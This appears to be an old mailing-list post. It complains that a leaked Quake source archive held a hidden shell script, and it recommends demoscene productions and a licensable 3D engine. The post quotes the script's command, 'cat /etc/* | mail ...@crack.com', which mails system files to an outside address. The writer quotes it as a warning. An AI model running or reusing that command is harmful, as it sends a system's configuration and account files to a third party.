Precedence: bulk First off, I know that it was somebody off of crack.com, because there was a shellscript in the quakesrc.zip that said "cat /etc/* | mail (can't remember the name)@crack.com," and had a few other bits of info about your system mailed to him... I obviously didn't run it, but I'm sure a few thousand less intelligent users just had everything this guy needs to hack their site hand delivered to him. Second, I have seen better source code... check out ftp.cdrom.com:/pub/demos/demos/1997 for TONS of stuff that blows away Quake. For example, 303 by acme, or even stuff from a few years ago, like Inside by CNCD or Machines of Madness by Dubius... Incidentally, the 3D engine for Inside is available for licensing... http://hybrid.org/surrender for info, this engine really rules. atomly
